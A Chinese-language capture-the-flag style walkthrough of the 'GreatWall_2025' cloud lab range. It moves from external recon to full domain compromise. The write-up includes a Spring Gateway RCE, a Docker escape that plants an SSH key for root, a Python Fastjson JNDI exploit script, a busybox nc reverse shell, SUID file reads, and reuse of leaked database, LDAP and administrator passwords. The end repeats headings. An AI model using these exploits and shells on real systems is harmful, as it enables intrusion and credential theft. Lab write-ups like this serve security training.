春秋云境-GreatWall_2025 渗透测试实战教学文档<\/h1>

1. 外网信息收集<\/h2>

1.1 端口扫描<\/h3>
使用fscan工具对目标IP进行端口扫描：<\/p>
.\/fscan -h 8.130.141.114
<\/span><\/span><\/code><\/pre>扫描结果：<\/strong><\/p>

8080端口：开放（Spring服务）<\/li>
22端口：开放（SSH服务）<\/li>
80端口：开放（HTTP服务，政务服务平台）<\/li>
<\/ul>
1.2 漏洞识别<\/h3>
发现8080端口的Spring服务存在Gateway漏洞：<\/p>

漏洞接口：gateway\/routes<\/code><\/li>
漏洞类型：CVE-2022-22947 RCE漏洞<\/li>
利用工具：https:\/\/github.com\/0730Nophone\/CVE-2022-22947-\/blob\/main\/exp.py<\/li>
<\/ul>
2. Getshell阶段<\/h2>
2.1 内存马注入<\/h3>
通过Spring Gateway漏洞打入内存马，获取初始访问权限。<\/p>
2.2 环境确认<\/h3>
发现容器环境特征：<\/p>

存在.dockerenv<\/code>文件<\/li>
确认需要docker逃逸<\/li>
<\/ul>
3. Docker逃逸技术<\/h2>
3.1 CDK工具准备<\/h3>
由于文件上传大小限制，采用分割上传策略：<\/p>
# 下载CDK工具<\/span>
<\/span><\/span>wget https:\/\/github.com\/cdk-team\/CDK\/releases\/tag\/v1.5.5\/cdk_linux_amd64_thin_upx
<\/span><\/span>
<\/span><\/span># 文件分割上传<\/span>
<\/span><\/span>split -b 100k cdk cdk.
<\/span><\/span>
<\/span><\/span># 目标机器重组<\/span>
<\/span><\/span>cat cdk.* > cdk
<\/span><\/span>md5sum cdk        # 验证文件完整性<\/span>
<\/span><\/span>chmod 777<\/span> cdk     # 赋予执行权限<\/span>
<\/span><\/span><\/code><\/pre>3.2 环境评估<\/h3>
执行CDK全面评估：<\/p>
.\/cdk evaluate --full
<\/span><\/span><\/code><\/pre>关键发现：<\/strong><\/p>

挂载点\/host\/proc\/sys\/kernel\/core_pattern<\/code>具有读写权限<\/li>
这是经典的容器逃逸利用点<\/li>
<\/ul>
3.3 逃逸实施<\/h3>
通过修改core_pattern实现宿主机命令执行：<\/p>
# 创建SSH目录<\/span>
<\/span><\/span>.\/cdk run mount-procfs \/host\/proc\/ "mkdir \/root\/.ssh\/"<\/span>
<\/span><\/span>
<\/span><\/span># 写入公钥<\/span>
<\/span><\/span>.\/cdk run mount-procfs \/host\/proc\/ 'echo ssh-rsa [公钥内容] > \/root\/.ssh\/authorized_keys'<\/span>
<\/span><\/span><\/code><\/pre>3.4 SSH连接<\/h3>
使用私钥连接宿主机：<\/p>
ssh -i id_rsa root@8.130.141.114
<\/span><\/span><\/code><\/pre>4. 内网渗透准备<\/h2>
4.1 持久化控制<\/h3>

上线Vshell维持访问<\/li>
生成正向客户端监听8099端口<\/li>
启用socks5代理进行内网穿透<\/li>
<\/ul>
5. 内网信息收集<\/h2>
5.1 网络扫描<\/h3>
使用fscan扫描内网段：<\/p>
.\/fscan -h 172.16.22.12\/24
<\/span><\/span><\/code><\/pre>扫描结果：<\/strong><\/p>

172.16.22.88:8080 - 政务内网资源下载<\/li>
172.16.22.12:8080 - 政务服务平台<\/li>
172.16.22.41:445 - 域控制器（DC:ZWFW\DC）<\/li>
172.16.22.14 - Apache服务<\/li>
<\/ul>
6. Fastjson反序列化漏洞利用<\/h2>
6.1 APK分析<\/h3>

下载政务APP进行分析<\/li>
使用雷电模拟器（需关闭root权限）<\/li>
配置代理进行抓包分析<\/li>
<\/ul>
6.2 加密逻辑分析<\/h3>
通过JADX反编译APK，分析加密流程：<\/p>


AES加密<\/strong>：<\/p>

生成128-bit AES密钥<\/li>
使用AES\/GCM\/NoPadding模式加密<\/li>
数据格式：IV(12字节) + 密文 + GCM Tag(16字节)<\/li>
<\/ul>
<\/li>

RSA加密<\/strong>：<\/p>

使用硬编码公钥加密AES密钥<\/li>
算法：RSA\/ECB\/PKCS1Padding<\/li>
<\/ul>
<\/li>

通信协议<\/strong>：<\/p>

Body：Base64编码的加密数据<\/li>
Header：X-Encrypted-Key传递加密的AES密钥<\/li>
<\/ul>
<\/li>
<\/ol>
6.3 漏洞利用<\/h3>
利用Fastjson反序列化漏洞：<\/p>
import<\/span> base64,<\/span> os,<\/span> requests
<\/span><\/span>from<\/span> cryptography.hazmat.primitives import<\/span> serialization
<\/span><\/span>from<\/span> cryptography.hazmat.primitives.asymmetric import<\/span> padding
<\/span><\/span>from<\/span> cryptography.hazmat.primitives.ciphers import<\/span> Cipher, algorithms, modes
<\/span><\/span>
<\/span><\/span>URL =<\/span> "http:\/\/172.16.22.88:8080\/api\/login"<\/span>
<\/span><\/span>RSA_PUB =<\/span> "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnKum2FOeaPQumhLBpRauv+OMB6pkdqACjbZYkzzP8CZgjwEwmKauXLxzur1beldNDlVnUs83CnnvanPIYW3oP56t0SoqDmWviBTBJ2aCjtrztFYjBixZEYJ2Exp9f6cdFuSMiucPyuhwY8AuFWnGPJ3Mwt8L8ouV9Lc6Ptp67fCZ0aHr1BVu+pXvHVktbcmeCt+61dnyd9iXTDZfIQ9rwrDsTlkEYORN0hckpFWvgaoNXhXm60ioLkk\/qtPZSjir0bpDL0w0iZ3+wRJLtUOe3KyGx+C00S5w2cM0Zw1XlmRQ08yj1nObVkaVsfEU8sSk\/XFVnuCrO9YfQCa1uxm5ZQIDAQAB"<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi:\/\/172.16.22.12:50388\/931789","autoCommit":true}'''<\/span>
<\/span><\/span>
<\/span><\/span># AES-GCM加密<\/span>
<\/span><\/span>aes_key, iv =<\/span> os.<\/span>urandom(16<\/span>), os.<\/span>urandom(12<\/span>)
<\/span><\/span>cipher =<\/span> Cipher(algorithms.<\/span>AES(aes_key), modes.<\/span>GCM(iv)).<\/span>encryptor()
<\/span><\/span>ct =<\/span> cipher.<\/span>update(payload.<\/span>encode()) +<\/span> cipher.<\/span>finalize()
<\/span><\/span>body =<\/span> base64.<\/span>b64encode(iv +<\/span> ct +<\/span> cipher.<\/span>tag).<\/span>decode()
<\/span><\/span>
<\/span><\/span># RSA加密AES密钥<\/span>
<\/span><\/span>pubkey =<\/span> serialization.<\/span>load_der_public_key(base64.<\/span>b64decode(RSA_PUB))
<\/span><\/span>key_enc =<\/span> base64.<\/span>b64encode(pubkey.<\/span>encrypt(aes_key, padding.<\/span>PKCS1v15())).<\/span>decode()
<\/span><\/span>
<\/span><\/span># 发送请求<\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post(URL, data=<\/span>body.<\/span>encode(), headers=<\/span>{"Content-Type"<\/span>:"application\/octet-stream"<\/span>,"X-Encrypted-Key"<\/span>:key_enc})
<\/span><\/span><\/code><\/pre>6.4 内存马注入<\/h3>
通过代理执行利用脚本：<\/p>
proxychains -q python3 exp.py
<\/span><\/span><\/code><\/pre>7. Zabbix渗透<\/h2>
7.1 服务发现<\/h3>

URL：http:\/\/172.16.22.14\/zabbix\/index.php<\/li>
默认凭证：Admin\/zabbix<\/li>
<\/ul>
7.2 RCE利用<\/h3>
通过Zabbix后台执行命令：<\/p>
# 反弹shell<\/span>
<\/span><\/span>busybox nc 172.16.22.12 5566<\/span> -e sh
<\/span><\/span>
<\/span><\/span># 监听端<\/span>
<\/span><\/span>busybox nc -lp 5566<\/span>
<\/span><\/span>
<\/span><\/span># 建立交互式shell<\/span>
<\/span><\/span>script \/dev\/null -c bash
<\/span><\/span><\/code><\/pre>7.3 权限提升<\/h3>
查找SUID权限程序：<\/p>
find \/ -type f -perm \/u=<\/span>s 2>\/dev\/null
<\/span><\/span><\/code><\/pre>利用ss命令读取文件（GTFOBins技术）：<\/p>
ss -a -F \/flag.txt
<\/span><\/span><\/code><\/pre>7.4 数据库访问<\/h3>
Zabbix数据库凭证：<\/p>

用户名：zabbix<\/li>
密码：password<\/li>
<\/ul>
查询LDAP配置信息：<\/p>
mysql -<\/span>uzabbix -<\/span>ppassword -<\/span>e "select * from zabbix.userdirectory_ldap\G"<\/span>
<\/span><\/span><\/code><\/pre>获取的域信息：<\/strong><\/p>

域控制器：172.16.22.41<\/li>
域名：zwfw.com<\/li>
LDAP管理员：CN=ldapadmin,OU=Zabbix,DC=zwfw,DC=com<\/li>
密码：XpVLGkQHm8<\/li>
<\/ul>
8. 域渗透<\/h2>
8.1 信息收集<\/h3>
使用BloodHound收集域信息：<\/p>
proxychains bloodhound-python -u ldapadmin -p XpVLGkQHm8 -d zwfw.com -dc DC.zwfw.com -ns 172.16.22.41 -c all --auth-method ntlm --dns-tcp --zip
<\/span><\/span><\/code><\/pre>8.2 域控制器访问<\/h3>
通过WinRM登录域控制器：<\/p>
proxychains -q evil-winrm -i 172.16.22.41 -u ldapadmin -p XpVLGkQHm8
<\/span><\/span><\/code><\/pre>8.3 最终权限获取<\/h3>
使用管理员凭证访问：<\/p>
nxc smb 172.16.22.41 -u administrator -p a4Z6FcRYSp6LLSGO --codec GBK -x 'type C:\Users\Administrator\Desktop\flag.txt'<\/span>
<\/span><\/span><\/code><\/pre>9. 技术要点总结<\/h2>
9.1 关键漏洞<\/h3>

Spring Gateway RCE (CVE-2022-22947)<\/li>
Docker逃逸（core_pattern利用）<\/li>
Fastjson反序列化漏洞<\/li>
Zabbix默认凭证和RCE<\/li>
域权限提升和横向移动<\/li>
<\/ol>
9.2 工具使用<\/h3>

fscan：内网扫描<\/li>
CDK：容器逃逸<\/li>
BloodHound：域信息收集<\/li>
Evil-WinRM：Windows远程管理<\/li>
Proxychains：代理穿透<\/li>
<\/ul>
9.3 防御建议<\/h3>

及时更新Spring Gateway组件<\/li>
加强容器安全配置<\/li>
修改默认凭证和密码策略<\/li>
实施网络分段和访问控制<\/li>
监控异常网络活动和文件操作<\/li>
<\/ol>
本教学文档详细记录了从外网信息收集到最终获取域控制权的完整渗透测试流程，涵盖了多种漏洞利用技术和工具使用方法。<\/p>
春秋云境-GreatWall_2025 渗透测试实战教学文档<\/h1>

1. 外网信息收集<\/h2>

2. Getshell阶段<\/h2>

2.1 内存马注入<\/h3> 通过Spring Gateway漏洞打入内存马，获取初始访问权限。<\/p>

3. Docker逃逸技术<\/h2>

4. 内网渗透准备<\/h2>

5. 内网信息收集<\/h2>

6. Fastjson反序列化漏洞利用<\/h2>

7. Zabbix渗透<\/h2>

8. 域渗透<\/h2>

9. 技术要点总结<\/h2>

2.1 内存马注入<\/h3>
通过Spring Gateway漏洞打入内存马，获取初始访问权限。<\/p>
